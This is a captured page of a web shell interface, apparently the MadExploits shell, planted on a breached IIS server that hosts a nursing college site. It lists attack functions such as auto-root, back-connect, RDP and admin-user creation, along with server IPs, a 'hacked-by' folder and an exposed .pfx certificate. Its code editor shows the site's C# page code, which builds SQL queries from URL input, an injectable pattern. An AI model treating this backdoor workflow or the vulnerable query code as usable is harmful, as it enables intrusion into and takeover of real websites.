Windows NT WIN8053 10.0 build 20348 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: 10.10.28.53 | : 216.73.216.191
Cant Read [ /etc/named.conf ]
8.0.23
sahaiassociates-001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ D ]
[ H ]
h: /
root /
home /
sahaiassociates-001 /
www /
ppscollegeofnursing /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxrwxrwx
Bin
[ DIR ]
drwxrwxrwx
calendar
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
hacked-by-overthrash1337
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
uploads
[ DIR ]
drwxrwxrwx
video
[ DIR ]
drwxrwxrwx
Achievement.aspx
2.92
KB
-rw-rw-rw-
Achievement.aspx.cs
2.62
KB
-rw-rw-rw-
Contact.aspx
4.27
KB
-rw-rw-rw-
Contact.aspx.cs
1.05
KB
-rw-rw-rw-
Default.aspx
14.31
KB
-rw-rw-rw-
Default.aspx.cs
5.47
KB
-rw-rw-rw-
EDefault.aspx
27.06
KB
-rw-rw-rw-
EDefault.aspx.vb
82
B
-rw-rw-rw-
MasterPage.master
32.02
KB
-rw-rw-rw-
MasterPage.master.cs
7.59
KB
-rw-rw-rw-
Pages.aspx
5.95
KB
-rw-rw-rw-
Pages.aspx.vb
79
B
-rw-rw-rw-
TOPPERS.aspx
2.04
KB
-rw-rw-rw-
TOPPERS.aspx.cs
2.18
KB
-rw-rw-rw-
comm.aspx
4.91
KB
-rw-rw-rw-
comm.aspx.cs
10.95
KB
-rw-rw-rw-
font-awesome.min.css
30.6
KB
-rw-rw-rw-
gallery.aspx
2.04
KB
-rw-rw-rw-
gallery.aspx.cs
2.16
KB
-rw-rw-rw-
google54c61c0b2d419343 (1).htm...
53
B
-rw-rw-rw-
google54c61c0b2d419343.html
53
B
-rw-rw-rw-
infrastructure.html
48.84
KB
-rw-rw-rw-
jquery.min.js
85.48
KB
-rw-rw-rw-
liz.php
62.03
KB
-rw-rw-rw-
mandatory-public-discloser.htm...
48.84
KB
-rw-rw-rw-
page.aspx
5.37
KB
-rw-rw-rw-
page.aspx.cs
5.34
KB
-rw-rw-rw-
ppscollegeofnursing.com.pfx
2.93
KB
-rw-rw-rw-
robots.txt
82
B
-rw-rw-rw-
sitemap.xml
2.24
KB
-rw-rw-rw-
skd-mobile-app.html
1.19
KB
-rw-rw-rw-
the-management.html
48.84
KB
-rw-rw-rw-
uploads.zip
60.53
MB
-rw-rw-rw-
web.config
646
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page.aspx.cs
using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.UI; using System.Web.UI.WebControls; using System.Data; using System.Data.SqlClient; using System.Configuration; using System.IO; using System.Net.Mail; using System.Net; using System.Web.UI.HtmlControls; public partial class school1_page : System.Web.UI.Page { string hostName; int idddd; SqlConnection con = new SqlConnection(ConfigurationManager.ConnectionStrings["dbcon"].ConnectionString); protected void Page_Load(object sender, EventArgs e) { Uri myuri = new Uri(System.Web.HttpContext.Current.Request.Url.AbsoluteUri); string pathQuery = myuri.PathAndQuery; hostName = myuri.ToString().Replace(pathQuery, ""); if (hostName.StartsWith("www.", StringComparison.OrdinalIgnoreCase)) hostName = hostName.Replace("www.", string.Empty); Session["dom"] = hostName; string text = Request.Url.ToString(); string lastPart = text.Split('=').Last(); Session["pid"] = lastPart; GLRR(); Label1.Text = lastPart; tpr(); achenn(); getnews22(); getnews22RRR(); } private void tpr() { Label masterLabel = (Label)Master.FindControl("m5"); SqlCommand cmd = new SqlCommand("SELECT * FROM FACC where REM='TOPPERS' and sid='" + Session["sid"] + "' and session='" + Session["pid"] + "'", con); SqlDataAdapter da = new SqlDataAdapter(cmd); DataTable dt = new DataTable(); da.Fill(dt); if (dt.Rows.Count > 0) { Label3.Text = masterLabel.Text; Repeater3.DataSource = dt; Repeater3.DataBind(); } else { Panel1.Visible = false; } } private void GLRR() { Label masterLabel3 = (Label)Master.FindControl("m6"); SqlCommand cmd = new SqlCommand("SELECT * FROM EIMGG where sid='" + Session["sid"] + "' and spg='" + Session["pid"] + "'", con); SqlDataAdapter da = new SqlDataAdapter(cmd); DataTable dt = new DataTable(); da.Fill(dt); if (dt.Rows.Count > 0) { Label5.Text = masterLabel3.Text; Repeater5.DataSource = dt; Repeater5.DataBind(); } else { Panel3.Visible = false; } } private void achenn() { Label masterLabel1 = (Label)Master.FindControl("m4"); SqlCommand cmd = new SqlCommand("SELECT * FROM FACC where REM='ACHIEVMENT ' and sid='" + Session["sid"] + "' and session='" + Session["pid"] + "'", con); SqlDataAdapter da = new SqlDataAdapter(cmd); DataTable dt = new DataTable(); da.Fill(dt); if (dt.Rows.Count > 0) { Label4.Text = masterLabel1.Text; Repeater4.DataSource = dt; Repeater4.DataBind(); } else { Panel2.Visible = false; } } protected void Repeater1_ItemDataBound(object sender, RepeaterItemEventArgs e) { if (e.Item.ItemType == ListItemType.Item || e.Item.ItemType == ListItemType.AlternatingItem) { //Image img = (Image)e.Item.FindControl("p1"); //string imagePath = DataBinder.Eval(e.Item.DataItem, "p1").ToString(); //// Check if the image path is empty or null //if (img.ImageUrl == "~/uploads/noimage.jpg") //{ // img.Visible = false; //} } } private void getnews22RRR() { SqlCommand cmd = new SqlCommand("select * from epgs WHERE SPG='" + Session["PID"] + "' and sid='" + Session["sid"] + "'", con); SqlDataAdapter da = new SqlDataAdapter(cmd); DataTable dt = new DataTable(); da.Fill(dt); DataRow dr; if (dt.Rows.Count > 0) { dr = dt.Rows[0]; string a = Convert.ToString(dr[0]); Label2.Text = Convert.ToString(dr["HD"]); Repeater2.DataSource = dt; Repeater2.DataBind(); } else { Panel4.Visible = false; } } private void getnews22() { SqlCommand cmd = new SqlCommand("select * from epggs WHERE sPG='" + Session["PID"] + "' and sid='" + Session["sid"] + "'", con); SqlDataAdapter da = new SqlDataAdapter(cmd); DataTable dt = new DataTable(); da.Fill(dt); if (dt.Rows.Count > 0) { Repeater1.DataSource = dt; Repeater1.DataBind(); } else { Panel5.Visible = false; } } protected void Repeater2_ItemDataBound(object sender, RepeaterItemEventArgs e) { if (e.Item.ItemType == ListItemType.Item || e.Item.ItemType == ListItemType.AlternatingItem) { // Get image control Image img = (Image)e.Item.FindControl("Image1"); // Get the data item DataRowView drv = (DataRowView)e.Item.DataItem; string imageUrl = drv["P1"].ToString(); // Check if image URL is empty/null/whitespace if (imageUrl == "~/uploads/noimage.jpg") { img.Visible = false; } } } }
Close